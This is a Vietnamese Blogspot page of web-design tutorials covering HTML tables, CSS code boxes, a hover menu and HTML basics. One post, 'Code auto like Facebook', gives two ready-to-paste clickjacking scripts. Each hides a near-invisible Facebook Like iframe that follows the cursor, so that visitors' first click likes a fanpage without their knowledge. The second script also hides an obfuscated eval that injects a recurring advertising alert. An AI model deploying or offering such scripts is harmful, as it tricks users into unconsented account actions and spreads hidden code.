Table tag - Thẻ tạo bảng biểu trong HTML

16:53 |
Table tag Thẻ tạo bảng biểu trong HTML
Chào các bạn ! Sau khi về quê nghỉ ngơi và xả strees, mình đã có lại cảm hứng để tiếp tục mọi việc. Hôm nay mình xin viết tiếp chuỗi bài về tự học lập trình blog, website. Qua bài viết trước, các bạn đã biết đến thẻ liên kết a, và qua bài viết này các bạn sẽ biết thêm về TABLE - thẻ dùng tạo bảng biểu trong HTML

Trong Word, table được tạo nên bởi hàng và cột thì trong HTML table cũng được tạo nên khi có 2 yếu tố đó. Trước đây, khi lập trình web, đa số đều sử dụng table để dàn trang vì dễ và tính hiệu quả của nó tương đối ổn. Ở Blogspot, không có nút như Word để tạo bảng nhanh, vì vậy, vì đặc thù công việc thì việc nhớ code tạo bảng sẽ rất có ích.

Cú pháp:
<table>...</table>
- Mỗi dòng trong bảng được tạo ra bởi thẻ <tr>...</tr>
- Mỗi ô được định nghĩa bởi thẻ <td>...</td>
- Tiêu đề của dòng hoặc cột được định nghĩa bởi thẻ <th>...</th>
* Dữ liệu trong các ô có thể là hình ảnh, âm thanh, văn bản, hoặc cũng có thể chứa một bảng khác.

Mình xét một ví dụ:

<table border="1">
<tr><!-- dòng 1 -->
      <td>Buổi</td> <!-- ô 1-->
      <th>Sáng</th>
      <th>Chiều</th>
      <th>Tối</th>
</tr>
<tr><!-- dòng 2 -->
      <th>Công việc</th>
      <td>Đi học</td>
      <td>Học tiếng anh</td>
      <td>Làm bài tập</td>
</tr>
</table>

BuổiSángChiềuTối
Công việcĐi họcHọc tiếng anhLàm bài tập

Nhìn vào bảng hiển thị, các bạn có thể sẽ rõ hơn chức năng của từng thẻ trong bảng, tuy nhiên vẫn còn những thuộc tính chúng ta cần nắm:
Thẻ <TABLE> bao gồm các thuộc tính:
 • border  : xác định độ dày đường kẻ bảng, như ví dụ trên là 1px.
 • align : dùng để căn lề, có 3 giá trị: left, center, right. Không hỗ trợ trong HTML5
 • background: xác định ảnh nền.
 • bgcolor : xác định màu nền.Không hỗ trợ trong HTML5
 • height, width : xác định chiều cao và độ rộng bảng, giá trị có thể là px(pixels) hoặc %.
 • cellspacing : xác định khoảng cách giữa các ô. Không hỗ trợ trong HTML5
 • cellpadding: xác định khoảng cách giữa dữ liệu trong ô và các cạnh của ô.Không hỗ trợ trong HTML5
>>Xem ví dụ về <TABLE>

Trong thẻ table có các thẻ con cấu thành nó, bao gồm:
Thẻ <TR> : (Table Rows): tạo ra các dòng cho bảng.
*Thuộc tính
 • align: căn lề cho các ô trong cùng một dòng. Không hỗ trợ trong HTML5.
 • valign: căn lề theo chiều dọc. có các giá trị : "top" - trên ; "middle" - trung  tâm ; "bottom" - dưới.; "baseline" - viết cách trên 1 dòng cơ bản. Không hỗ trợ trong HTML5.
 • bgcolor: xác định màu nền cho dòng. Không hỗ trợ trong HTML5.
>>Xem ví dụ về <TR>

Thẻ <TH> : (Table Heading cell) - Tạo tiêu đề cho 1 ô hoặc 1 dòng.
Thẻ <TD> : (Table Data) - Tạo 1 ô dữ liệu.
* Thuộc tính:
 • align, valign: căn lề cho dữ liệu theo chiều ngang, chiều dọc. Không hỗ trợ trong HTML5.
 • background, bgcolor: xác định ảnh nền, màu nền cho ô dữ liệu. Không hỗ trợ trong HTML5.
 • height, width: xác định chiều cao, chiều dài của ô. Không hỗ trợ trong HTML5.
 • rowspan: xác định phạm vi mở rộng của ô theo hàng. Không hỗ trợ trong HTML5.
 • colspan: xác định phạm vi mở rộng của ô theo cột. Không hỗ trợ trong HTML5.
>> Xem ví dụ về <TH><TD>

Hiện nay, thẻ table còn có các thẻ con quy định vị trí của từng phần trong bảng:
<thead> : quy định dữ liệu sẽ luôn ở trên cùng của bảng, thường làm tiêu đề của cột.
<tbody>: quy định dữ liệu phần giữa bảng, sau thẻ </thead>
<tfoot>: quy định dữ liệu cuối bảng.
Thuộc tính:
 • align, valign: căn lề cho dữ liệu theo chiều ngang, chiều dọc. Không hỗ trợ trong HTML5.
 • background, bgcolor: xác định ảnh nền, màu nền cho phần tử bảng. Không hỗ trợ trong HTML5.
 • height, width: xác định chiều cao, chiều dài của phần tử bảng. Không hỗ trợ trong HTML5.

Để phân biệt các thẻ này, trình duyệt tự động tạo ra đường viền lớn hơn giao giữa 3 phần và đặc biệt, dù bạn có sắp xếp lộn xộn các thẻ này cho nhau thì trình duyệt sẽ vẫn hiện đúng

Bạn xem qua ví dụ đây

Cảm ơn mọi người đã đọc bài viết, hẹn gặp lại ! Thân !


Xem Chi Tiết…

Code box đẹp để chèn code vào bài viết dạng HTML

13:11 |
Cách chèn code vào bài viết
 | Nếu bạn cần chèn đoạn code gì đó vào bài viết trong Blogger/blogspot theo cách thông thường sẻ rất mất thẩm mỹ và khó cho người lấy để sử dụng hoặc có thể xảy ra lỗi gì đây, vì vậy mình giới thiệu tới bạn những code box khá đẹp và phong cách.

Các bước để thực hiện


 • 1. Vào bảng điều khiển --> Mẫu -->Chỉnh sữa HTML
 • 2. Sử dụng Ctrl + F tìm đến thẻ ]]></b:skin>
 • 3. Chọn kiểu mà bạn thích dưới đây và chèn vào bên trên thẻ ]]></b:skin>

Style 1

Code box đẹp để chèn code vào bài viết dạng HTML


#BLTextbox1 {
font-family:'Century Gothic',futura,'URW Gothic L',Verdana,sans-serif;font-weight:normal;font-style:normal;font-size:16px;
padding-left:10px;padding-top:12px;padding-bottom:12px;padding-right:10px; margin-top:15px;margin-bottom:15px;
color:black;background:#77A8E0;
overflow:auto;
width:550px;height:auto;max-height:300px;
border:2px solid #878787;
-moz-transition:all .8s linear ;
-webkit-transition:all .8s linear ;
-o-transition:all .8s linear ;
transition:all .8s linear ;
}
#BLTextbox2 p {width:100%; }
#BLTextbox2:hover {
background:#71A4DF;
border-color:#F1D66B;
-moz-transition:background .4s ease-in 20ms;
-webkit-transition:background .4s ease-in 20ms;
-o-transition:background .4s ease-in 20ms;
transition:background .4s ease-in 20ms;
}


Khi cần chèn vào bài viết bạn sử dụng code dạng sau ở chế độ html trong bài viết

<div id="BLTextbox1">
<p>
code của bạn đặt ở đây....
</p>
</div>

Style 2

Code box đẹp để chèn code vào bài viết dạng HTML

#BLTextbox2 {
font-family:'Century Gothic',futura,'URW Gothic L',Verdana,sans-serif;font-weight:normal;font-style:normal;font-size:15px;
padding-left:10px;padding-top:5px;padding-bottom:5px;padding-right:10px; margin-top:15px;margin-bottom:15px;
color:#626279;background:rgba(230,189,66,0.8);
overflow:auto;
width:550px;height:auto;max-height:300px;
border:2px solid #878787;
filter:alpha(opacity=75%);
-moz-opacity:0.75;-khtml-opacity:0.75;
opacity:0.75;
-moz-transition:all .8s ease ;
-webkit-transition:all .8s ease ;
-o-transition:all .8s ease ;
transition:all .8s ease ;
}
#BLTextbox3 p {width:100%; }
#BLTextbox3:hover {
background:#E9C845;
border-color:#cc2196;
-moz-transition:background .4s ease-in 20ms;
-webkit-transition:background .4s ease-in 20ms;
-o-transition:background .4s ease-in 20ms;
transition:background .4s ease-in 20ms;
}

Sử dụng trong bài viết

<div id="BLTextbox2">
<p>
code của bạn đặt ở đây.......
</p>
</divStyle 3

Code box đẹp để chèn code vào bài viết dạng HTML


#BLTextbox3 {
font-family:'Arial Narrow','Nimbus Sans L',sans-serif;
padding-left:10px;padding-top:2px;padding-bottom:4px;padding-right:10px; margin-top:15px;margin-bottom:15px;
color:#212121;background:#CBCAC7;
overflow:auto;
width:550px;height:auto;max-height:300px;
border:2px solid #ACABA7;
border-radius:8px;-moz-border-radius:8px;-webkit-border-radius:8px;
-moz-transition:all .8s linear ;
-webkit-transition:all .8s linear ;
-o-transition:all .8s linear ;
transition:all .8s linear ;
}
#BLTextbox4 p {width:100%; }
#BLTextbox4:hover {
background:#BFBFBE;
border-color:#C49782;
-moz-transition:background .4s cubic-bezier 20ms;
-webkit-transition:background .4s cubic-bezier 20ms;
-o-transition:background .4s cubic-bezier 20ms;
transition:background .4s cubic-bezier 20ms;
}

Sử dụng trong bài viết


<div id="BLTextbox3">
<p>
code của bạn đặt ở đây.......
</p>
</div>

Style 4

Code box đẹp để chèn code vào bài viết dạng HTML

#BLTextbox4 {
font-family:'Arial Narrow','Nimbus Sans L',sans-serif;
padding-left:12px;padding-top:2px;padding-bottom:4px;padding-right:10px; margin-top:15px;margin-bottom:15px;
color:#555555;background:#ccc;
width:550px;height:auto;max-height:350px;
overflow:auto;
border:2px dotted #59903E;
-moz-opacity:0.75;
-khtml-opacity:0.75;
filter:alpha(opacity=75%);
opacity:0.75;
-moz-transition:all .9s ease-in-out ;
-webkit-transition:all .9s ease-in-out ;
-o-transition:all .9s ease-in-out ;
transition:all .9s ease-in-out ;
}
#BLTextbox11 p {width:100%;}
#BLTextbox11:hover {
background:#ccc;
color:#333;
filter:alpha(opacity=97%);
-moz-opacity:0.97;
-khtml-opacity:0.97;
opacity:0.97;
-moz-transition:all .3s ease-in ;
-webkit-transition:all .3s ease-in ;
-o-transition:all .3s ease-in ;
transition:all .3s ease-in ;
}

Áp dụng vào bài viết

<div id="BLTextbox4">
<p>
Code của bạn ở đây
</p>
</div
Xem Chi Tiết…

Code Css Icon thay đổi khi rê chuột vào trên Blogspot, Website

23:55 |
Một dạng Code sử dụng làm menu cho Blog, Website khá đẹp và sinh động đang được người dùng Blog, Web hướng tới đó là kiểu mẫu hiệu ứng động khi rê chuột vào. Chỉ với việc sử dụng code CSS + HTML nên sẽ không ảnh hưởng tới tốc độ Load của Web, blog của bạn.

Code Css Icon thay đổi khi rê chuột vào trên Blogspot, Website
DEMO
Để dễ dàng hơn Thế Giới Blog chia sẻ code và hướng dẫn cách làm trên Blogger

1. Code


CSS

/* The CSS Code for the menu starts here bloggertrix.com */
#btrix-nav {margin: 100px auto;list-style: none;width: 632px;height: 87px;overflow-y: hidden;}
#btrix-nav li {float: left;}
#btrix-nav li a {display: block;color: white;width: 120px;height: 61px;margin-top: 24px;text-decoration: none;text-align: center;border-top: 1px solid #bbb;border-bottom: 1px solid #555;}
#btrix-nav li a span.aname {font: bold 17px/61px "Arial";color: #fff;text-transform: uppercase;cursor: pointer;position: relative;top: 0;transition: top .5s ease;text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);}
#btrix-nav li a img {position: relative;top: 0;transition: top .5s ease;}
#btrix-nav li a:hover {cursor: pointer;}
#btrix-nav li a:hover img {top: -85px;}
#btrix-nav li a:hover .aname {top: 85px;}
#btrix-nav li:nth-child(1) a {background: #3eb006;border-radius: 5px 0 0 5px;border-left: 1px solid #bbb;}
#btrix-nav li:nth-child(2) a {background: #9bc704;}
#btrix-nav li:nth-child(3) a {background: #0dc3ff;}
#btrix-nav li:nth-child(4) a {background: #51a2ec;}
#btrix-nav li:nth-child(5) a {background: #6e3cab;border-radius: 0 5px 5px 0;border-right: 1px solid #555;}

HTML

<div id="btrix-nav">
<li>
<a href="http://www.itviet360.com/"><span class="aname">Homes</span>
<img src="http://2.bp.blogspot.com/-vcR6lUGsroY/Ug5ATZk8oZI/AAAAAAAAA00/XENkFMaBgv0/s1600/btrix-home.png" />
</a>
</li>

<li>
<a href="http://www.itviet360.com/search/label/Download">
<span class="aname">Download</span>
<img src="http://2.bp.blogspot.com/-TcXder58ssQ/Ug5ASx8pT0I/AAAAAAAAA0o/5UdA4_gLnV8/s1600/btrix-download.png" />
</a>
</li>

<li>
<a href="http://www.itviet360.com/p/dich-vu-seo-web-gia-re-giai-phap-tot.html">
<span class="aname"> dvSEO</span>
<img src="http://2.bp.blogspot.com/-umlQ7fKXobk/Ug5AT2bLnnI/AAAAAAAAA08/yrQHl6qPMH8/s1600/btrix-mysql.png" />
</a>
</li>

<li>
<a href="http://www.itviet360.com/search/label/html-css">
<span class="aname"> Html</span>
<img src="http://2.bp.blogspot.com/-2-iy8RJ92V8/Ug5ASDCru-I/AAAAAAAAA0c/GOBCPpZlA04/s1600/Btrix-html.png" />
</a>
</li>

<li>
<a href="http://www.itviet360.com/p/phong-vu-seo.html">
<span class="aname">Contact</span>
<img src="http://4.bp.blogspot.com/-vsm9s0yQr9I/Ug5ASjqawnI/AAAAAAAAA0k/rqb01AbGaFw/s1600/btrix-contact.png" />
</a>
</li>
</div>

- Những giá trị mình bôi các bạn thay bằng của riêng mình nhé


2. Hướng dẫn trên Blogspot


- Vào bảng điều khiển blogger -> Mẫu (Template) -> chỉnh sửa HTML (Edit HTML)
- Tìm tới đoạn code ]]></b:skin>  và dán Code CSS lên trước nó và lưu mẫu lại
- Vào bố cục (Layout) -> Thêm tiện ích (Add a Widget) -> HTML/Javascript
- Dán code HTML vào tiện ích vừa thêm và lưu lại

Xem Chi Tiết…

Code auto like Facebook khi click chuột vào vị trí bất kỳ cho web, blogspot

23:53 |
Hiện nay bạn thấy khá nhiều trang trên face có số lượng like rất lớn nhưng thực tế có phải đó là con số thực hay không, Câu trả lời đa số là không. Rất nhiều người đã dùng mẹo để người dùng trở thành viên của họ mà đến người dùng nếu không để ý cũng không hề hay biết chuyện đó. Và chính bản thân mình nhiều lúc cũng thấy lạ là tại sao mình không hề like trang đó mà trên timeline lại nói mình thích trang đó.

Qua tìm hiển, đã phát hiện ra họ đang sử dụng một phương thức đó là dùng script auto like để khiến người đùng like trang fanpage mà không hề hay biết. Mình giới thiệu nhưng nó không đồng nghĩa với việc mình khuyến khích các bạn sử dung cách này vì sau đó nếu họ bấm unlike thì sẽ mất hình ảnh của bạn đó.

Bài viết này mình sẽ giới thiệu với các bạn 2 style khác nhau để các bạn lựa chọn cho thích hợp với sở thích của chính các bạn, Mỗi dạng sẽ có một ưu điểm khác nhau bạn có thể tham khảo ở bên dươi: Style 1: Bấm lần một sẽ là like và bấm tiếp lần 2 sẽ là unlike
Style 2: Bấm lần một sẽ là like và bấm tiếp lần 2 sẽ không bị unlike

» Nguyên tắc hoạt động của Auto like Facebook khi click chuột vào vị trí bất kỳ cho blogspot


- Cách tăng này thành công 100%, không hack, ko lừa gạt và thường áp dụng cho những website blog có lượt truy cập lớn (cách này tăng like rất nhanh và hiệu quả)

- Cách tăng like fanpage này dựa chủ yếu vào việc tạo ra 1 nút Like Fanpage. Nút Like này sẽ được chèn vào website của bạn dưới dạng “ẩn” (tức là người dùng không nhìn thấy). Sau đó nút Like này sẽ được cấu hình để “chạy” theo con trỏ chuột (tất nhiên là chạy ẩn để người dùng không nhìn thấy, không gây khó chịu).

- Khi người dùng vào website, click phát đầu tiên vào bất cứ mục nào trên website của bạn, thì vô hình họ đã click Like Fanpage do bạn đặt vào website của mình.


» Style 1: Kết hợp cả lile và dislike tự động cho facebook


Với style này khi bạn click chuột lần đầu sẽ là like nhưng nếu bạn tiếp tục bấm chuột lần nữa thì nó sẽ là dislike, Điều này đồng nghĩa với việc hên xui kiểu 50 - 50 có lúc được có lúc không.


1- Vào Bố cục (Layout)
2- Tạo một tiện ích HTML/Javascripts và dán code bên dưới vào:

<script type="text/javascript">
//<![CDATA[
(function(){
var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://www.facebook.com/itviet360') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=30';
lbox.scrolling = 'no';
lbox.frameBorder = 0;
lbox.allowTransparency = 'true';
lbox.style.border = 0;
lbox.style.overflow = 'hidden';
lbox.style.cursor = 'pointer';
lbox.style.width = '53px';
lbox.style.height = '23px';
lbox.style.position = 'absolute';
lbox.style.opacity = 0.5;
document.getElementsByTagName('body')[0].appendChild(lbox);
window.addEventListener('mousemove', mouseMove, false);
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(lbox);
window.removeEventListener('mousemove', mouseMove, false);
}, 10000);
function mouseMove(e) {
if (IE) {
Xcord = event.clientX + document.body.scrollLeft;
Ycord = event.clientY + document.body.scrollTop;
} else {
Xcord = e.pageX;
Ycord = e.pageY;
}
if (Xcord < 0) Xcord = 0;
if (Ycord < 0) Ycord = 0;
lbox.style.top = (Ycord - 8) + 'px';
lbox.style.left = (Xcord - 25) + 'px';
return true
}
})();
//]]>
</script>

» Tùy chỉnh:


Bạn thay http://www.facebook.com/baotuoitredoisong thành URL trang face của bạn.
Tùy chỉnh lại các giá trị màu cam cho phù hợp với bạn nha,
3- Lưu tiện ích lại và kiểm tra kết quả của bạn nha.


» Style 2: Tự động like lần đầu và những lần bấm sau không có tác dụng.


Với dạng này Khi người dùng click lần 1 sẽ like Fan của bạn, nhưng nếu họ click thêm lần nữa bị cũng không bị Unlike (giảm nguy cơ mất like)
1- Vào Bố cục (Layout)
2- Tạo một tiện ích HTML/Javascripts và dán code bên dưới vào:

<script>
var fan_page_url = 'https://www.facebook.com/itviet360'
var opacity =0.04;
var time = 45000;
</script>
<script>
if((document.getElementById) && window.addEventListener || window.attachEvent){
(function(){
var hairCol = "#ff0000";

var d = document;
var my = -10;
var mx = -10;
var r;
var vert = "";

var idx = document.getElementsByTagName('div').length;

var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&layout=standard&show_faces=true&width=80&action=like&colorscheme=light&height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";
var like;
var faceLike=getCookie("faceLike");
if (faceLike!=null && faceLike!="")
{
}
else
{
setCookie("faceLike",'liked',1);
document.write(thehairs);
like = document.getElementById("theiframe");
document.getElementsByTagName('body')[0].appendChild(like);
}
eval('\u0073\u0065\u0074\u0049\u006e\u0074\u0065\u0072\u0076\u0061\u006c\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0047\u0069\u0061\u0069\u0070\u0068\u0061\u0070\u0074\u0068\u0075\u006f\u006e\u0067\u0068\u0069\u0065\u0075\u002e\u006f\u0072\u0067\u0020\u0063\u0068\u0075\u0079\u00ea\u006e\u0020\u0074\u0072\u0061\u006e\u0067\u0020\u006d\u0061\u0072\u006b\u0065\u0074\u0069\u006e\u0067\u0020\u0077\u0065\u0062\u0073\u0069\u0074\u0065\u0022\u0029\u007d\u002c\u0031\u0038\u0030\u0030\u0030\u0030\u0030\u0030\u0029\u003b');

var pix = "px";
var domWw = (typeof window.innerWidth == "number");
var domSy = (typeof window.pageYOffset == "number");


if (domWw)
r = window;
else{
if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
r = d.documentElement;
else{
if (d.body && typeof d.body.clientWidth == "number")
r = d.body;
}
}


if(time != 0){
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(like);

if (window.addEventListener){
document.removeEventListener("mousemove",mouse,false);
}
else if (window.attachEvent){
document.detachEvent("onmousemove",mouse);
}
}, time);
}

function scrl(yx){
var y,x;
if (domSy){
y = r.pageYOffset;
x = r.pageXOffset;
}
else{
y = r.scrollTop;
x = r.scrollLeft;
}
return (yx == 0) ? y:x;
}

function mouse(e){
var msy = (domSy)?window.pageYOffset:0;
if (!e)
e = window.event;
if (typeof e.pageY == 'number'){
my = e.pageY - 15 - msy;
mx = e.pageX - 34;
}
else{
my = e.clientY - 16 - msy;
mx = e.clientX - 36;
}
vert.top = my + scrl(0) + pix;
vert.left = mx + pix;
}

function ani(){
vert.top = my + scrl(0) + pix;
setTimeout(ani, 300);
}


function init(){
vert = document.getElementById("theiframe").style;
ani();
}
function getCookie(c_name)
{
var c_value = document.cookie;
var c_start = c_value.indexOf(" " + c_name + "=");
if (c_start == -1)
{
c_start = c_value.indexOf(c_name + "=");
}
if (c_start == -1)
{
c_value = null;
}
else
{
c_start = c_value.indexOf("=", c_start) + 1;
var c_end = c_value.indexOf(";", c_start);
if (c_end == -1)
{
c_end = c_value.length;
}
c_value = unescape(c_value.substring(c_start,c_end));
}
return c_value;
}

function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}

function checkCookie()
{
var faceLike=getCookie("faceLike");
if (faceLike!=null && faceLike!="")
{

alert("Welcome again " + faceLike);

}
else
{
setCookie("faceLike",'liked',1);
}
}


if (window.addEventListener){
window.addEventListener("load",init,false);
document.addEventListener("mousemove",mouse,false);
}
else if (window.attachEvent){
window.attachEvent("onload",init);
document.attachEvent("onmousemove",mouse);
}

})();
}//End
</script>

Lưu mẫu lại và kiểm tra thành quả của bạn nha.

Xem Chi Tiết…

Học HTML Basic

02:26 |
Chú ý nếu bạn vẫn thấy xuất hiện 1 số từ tiếng Anh - đó là do chúng tôi không tìm được từ tiếng Việt tương ứng, việc dịch thẳng sang tiếng Việt sẽ làm giảm sự ý nghĩa và làm cho tài liệu khó hiểu hơn. bạn nên tiếp tục đọc thêm các đọan kế sẽ dần hiểu rõ ý nghĩa của từ tiếng Anh tương ứng.
 
 
- HTML là chữ viết tắt của Hyper Text Markup Language (Ngôn ngữ hiển thị siêu văn bản).
- Một file HTML là một file text bao gồm những tag nhỏ
- Những tag hiển thị nói cho trình duyệt biết nó phải hiển thị trang đó như thế nào
- Một file HTML phải có phần mở rộng là .htm hoặc .html
- Một file HTML có thể được tạo bởi một trình soạn thảo đơn giản.
 
Bạn có muốn thử không?
 
Nếu bạn sử dụng Window hãy mở Notepad, nếu bạn sử dụng Mac mở ứng dụng Simple Text. Với OSX bạn mở TextEdit và thay đổi lựa chọn sau: Select (trong cửa sổ preference) > Plain Text thay vì Rich Text và chọn "Ignore rich text commands in HTML files". Việc này rất quan trọng bởi vì nếu bạn không làm vậy thì code HTML có thể không đúng.
Sau đó bạn gõ vào những dòng sau:
 
<html>
<head>
<title>Viet Photoshop</title>
</head>
<body>
www.vietphotoshop.com and www.bantayden.com. <b>Photoshop and web design resources </b>
</body>
</html>

Lưu file lại với tên là "mypage.htm" vào desktop cũng được. Sau đó bạn đóng trình soạn thảo Notepad hoặc Simple Text lại và tìm đến file mypage.htm ở desktop rồi nhấp đúp vào trình duyệt sẽ hiển thị nội dung của trang.

Giải thích ví dụ trên:
 
Thẻ đầu tiên trong tài liệu HTML là <html>. Thẻ này nói cho trình duyệt biết đây là điểm khởi đầu của một tài liệu HTML. Thẻ cuối cùng của tài liệu là </html>, thẻ này nói cho trình duyệt biết đây là điểm kết thúc của văn bản.

Đoạn chữ nằm giữa hai thẻ <head> và </head> là thông tin của header. Thông tin header sẽ không được hiển thị trên cửa sổ trình duyệt.
Đoạn chữ nằm giữa cặp thẻ <title> là tiêu đề của văn bản. Dòng tiêu đề này sẽ xuất hiện ở thanh trạng thái của trình duyệt web.
Đoạn chữ nằm giữa hai thẻ <body> là những gì nó sẽ thể hiện trên trình duyệt của bạn.
Đoạn chữ nằm giữa hai thẻ <b> và </b> sẽ xuất hiện dưới dạng đậm
 
Phần mở rộng là HTM hay HTML?

Khi bạn lưu một văn bản dưới dạng HTML, bạn có thể sử dụng cả hai dạng là .htm và .html. Chúng ta đã sử dụng dạng .htm trong ví dụ trên. Lý do này bắt nguồn từ nguyên nhân ngày trước là có những phần mềm chỉ cho phép phần mở rộng có tối đa là 3 chữ cái. Với những phần mềm mới hiện nay chúng ta nghĩ sẽ tốt hơn nếu bạn lưu lại với phần mở rộng là .html

Một chú ý khi sử dụng trình soạn thảo HTML:

Bạn có thể dễ dàng chỉnh sửa một tài liệu HTML bằng cách sử dụng WYSIWYG (what you see is what you get = thấy gì có đó) như là Frontpage, Claris Homepage, Dream weaver hoặc Adobe PageMill thay vì bạn phải tự viết những cặp thẻ từ đầu đến cuối. Nhưng nếu bạn muốn trở thành một web master đầy kỹ thuật, tôi khuyên bạn nên sử dụng những trình soạn thảo text đơn giản để học và làm quen với cấu trúc câu lệnh của HTML.

Những câu hỏi thường gặp

Q: Sau khi tôi đã chỉnh sửa một file HTML, nhưng tôi không thể xem được kết quả ở trình duyệt. Tại sao vậy?
A: Bạn phải chắc rằng bạn đã lưu file đó với phần mở rộng là .htm hoặc .html, như ở ví dụ trên là mypage.htm.

Q: Tôi đã thử chỉnh sửa file HTML của tôi nhưng lại không thấy thay đổi gì ở trình duyệt cả. Tại sao vậy?
A: Trình duyệt tự động cach trang của bạn do đó nó không phải đọc cùng một trang hai lần. Khi bạn thay đổi gì đó ở một trang, trình duyệt nó không thể nhận ra được những thay đổi đó. Sử dụng nút refresh hoặc reload của trình duyệt để bắt nó đọc lại những thay đổi bạn tạo ra.

Q: Tôi nên sử dụng trình duyệt nào?
A: Bạn có thể thực tập tất cả những bài thực hành trong phần này với những trình duyệt thông dụng như Internet Explorer, Mozilla, Netscape hoặc Opera. Tuy nhiên, một vài ví dụ trong phần nâng cao đòi hỏi bạn phải có phiên bản mới nhất của trình duyệt.

Q: Tôi bắt buộc phải sử dụng Window sao? còn Mac thì sao?
A: Bạn có thể thực tập tất cả những bài thực hành trong phần này với hệ điều hành không phải là Windows như Mac. Tuy nhiên một vài ví dụ trong phần nâng cao đòi hỏi bạn phải có phiên bản mới hơn của Windows, như là Window98 hoặc Windows 2000.


Các dạng thẻ HTML
 • Thẻ HTML dùng để viết lên những thành tố HTML
 • Thẻ HTML được bao quanh bởi hai dấu lớn hơn < và > nhỏ hơn.
 • Những thẻ HTML thường có một cặp giống như <b> và </b>
 • Thẻ thứ nhất là thẻ mở đầu và thẻ thứ hai là thẻ kết thúc.
 • Dòng chữ ở giữa hai thẻ bắt đầu và kết thúc là nội dung.
 • Những thẻ HTML không phân biệt in hoa và viết thường, ví dụ dạng <b> và <B> đều như nhau,

Thành phần HTML
Nhớ lại ví dụ ở trên của chúng ta về HTML
<html>
<head>
<title>Viet Photoshop</title>
</head>
<body>
www.vietphotoshop.com and www.bantayden.com. <b>Photoshop and web design resources </b>
</body>
</html>
<b>Photoshop and web design resources </b>

Thành phần của HTML bắt đầu với thẻ: <b>
Nội dung của nó là: Photoshop and web design resourcesThành phần của HTML kết thúc với thẻ: </b>
Mục đích của thẻ <b> là để xác định một thành phần của HTML phải được thể hiện dưới dạng in đậm

Đây cũng là một thành phần của HTML:
<body>
www.vietphotoshop.com and www.bantayden.com. <b>Photoshop and web design resources </b>
</body>

Phần này bắt đầu bằng thẻ bắt đầu <body> và kết thúc bằng thẻ kết thúc </body>. Mục đích của thẻ <body> là xác định thành phần của HTML bao gồm nội dung của tài liệu.

Các thuộc tính của thẻ HTML
 
Những thẻ HTML đều có những thuộc tính riêng. Những thuộc tính này cung cấp thông tin về thành phần HTML của trang web. Tag này xác định thành phần thân của trang HTML: <body>. Với một thuộc tính thêm vào là bgcolor, bạn có thể báo cho trình duyệt biết rằng màu nền của trang này là màu đỏ, giống như sau: <body bgcolor="red"> hoặc <body bgcolor="#E6E6E6"> (#E6E6E6 là giá trị hex của màu)
Thẻ này sẽ xác định dạng bảng HTML:<table> với một thuộc tính đường viền (border), bạn có thể báo cho trình duyệt biết rằng bảng sẽ không có đường viền: <table border="0">

Thuộc tính luôn luôn đi kèm một cặp như name/value: name="value" (tên="giá trị")
thuộc tính luôn luôn được thêm vào thẻ mở đầu của thành phần HTML.
Dấu ngoặc kép, "red" hoặc 'red'Giá trị thuộc tính nên được đặt trong dấu trích dẫn " và ". Kiểu ngoặc kép như vậy thì phổ biến hơn, tuy nhiên kiểu đơn như ' và ' cũng có thể được dùng. Ví dụ trong một vài trường hợp đặc biệt hiếm, ví dụ như giá trị thuộc tính đã mang dấu ngoặc kép rồi, thì việc sử dụng ngoặc đơn là cần thiết. Ví du
name='ban"tay"den'

Những thẻ quan trọng nhất trong HTML là những thẻ xác định Heading, đoạn văn và xuống dòng.

Headings
Headings được định dạng với hai thẻ <h1> đến <h6>. <h1> xác định heading lớn nhất. <h6> xác định heading nhỏ nhất
<h1>Đây là heading</h1>
<h2>Đây là heading</h2>
<h3>Đây là heading</h3>
<h4>Đây là heading</h4>
<h5>Đây là heading</h5>
<h6>Đây là heading</h6>
HTML sẽ tự động thêm một dòng trắng trước và sau mỗi heading.

Đoạn văn - paragraphs
Paragraphs được định dạng bởi thẻ <p>.
<p>Đây là đoạn văn</p>
<p>Đây là một đoạn văn khác</p>

HTML sẽ tự động thêm một dòng trắng trước và sau mỗi heading.

Line Breaks - xuống dòng
Thẻ <br> được sử dụng khi bạn muốn kết thúc một dòng nhưng lại không muốn bắt đầu một đoạn văn khác. Thẻ <br> sẽ tạo ra một lần xuống dòng khi bạn viết nó.
<p>Đây <br> là một đo<br>ạn văn với thẻ xuống hàng</p>

Thẻ <br> là một thẻ trống, nó không cần thẻ đóng dạng </br>

Lời chú thích trong HTMLThẻ chú thích được sử dụng để thêm lời chú thích trong mã nguồn của HTML. Một dòng chú thích sẽ được bỏ qua bởi trình duyệt. Bạn có thể sử dụng chú thích để giải thích về code của bạn, để sau này bạn có phải quay lại chỉnh sửa gì thì cũng dễ nhớ hơn.
<!-- Chú thích ở trong này -->
Bạn cần một dấu chấm than ! ngay sau dấu nhỏ hơn nhưng không cần ở dấu lớn hơn.

Những thẻ HTML cơ bản

Tag
Mô Tả
<html>
Xác định một văn bản dạng HTML
<body>
Xác định phần thân của tài liệu
<h1> to <h6>
Xác định header từ 1 đến 6
<p>
Xác định một đoạn văn
<br>
Chèn một dòng trắng
<hr>
Xác định một đường thẳng
<!-->
Xác định vùng chú thíchMột vài ví dụ
Ví dụ này giải thích thêm về vài thuộc tính của đoạn văn bản.

Ví dụ này giải thích về cách sử dụng thẻ xuống hàng
